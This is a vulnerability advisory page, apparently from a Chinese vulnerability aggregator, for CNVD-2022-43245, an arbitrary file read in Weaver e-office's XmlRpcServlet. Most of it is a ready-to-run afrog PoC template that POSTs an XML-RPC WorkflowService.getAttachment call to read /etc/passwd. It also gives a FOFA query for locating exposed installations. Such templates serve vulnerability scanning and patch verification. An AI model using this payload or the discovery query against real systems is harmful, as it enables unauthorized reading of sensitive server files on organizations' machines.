CNVD-2022-43245: Weaver OA XmlRpcServlet - Arbitary File Read

日期: 2025-09-01 | 影响软件: OA XmlRpcServlet | POC: 已公开

漏洞描述

e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information. FOFA: app="泛微-协同办公OA"

PoC代码[已公开]

id: CNVD-2022-43245

info:
  name: Weaver OA XmlRpcServlet - Arbitary File Read
  author: SleepingBag945
  severity: high
  verified: true
  description: |-
    e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.
    FOFA: app="泛微-协同办公OA"
  tags: cnvd,cnvd2022,weaver,e-office,oa,lfi
  created: 2023/09/21

rules:
  r0:
    request:
      method: POST
      path: /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet
      headers:
        Content-Type: application/xml
      body: |
        <?xml version="1.0" encoding="UTF-8"?><methodCall>
        <methodName>WorkflowService.getAttachment</methodName>
        <params><param><value><string>/etc/passwd</string>
        </value></param></params></methodCall>
    expression: response.status == 200 && response.body.bcontains(b"<methodResponse><params><param><value><base64>")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2022/CNVD-2022-43245.yaml

相关漏洞推荐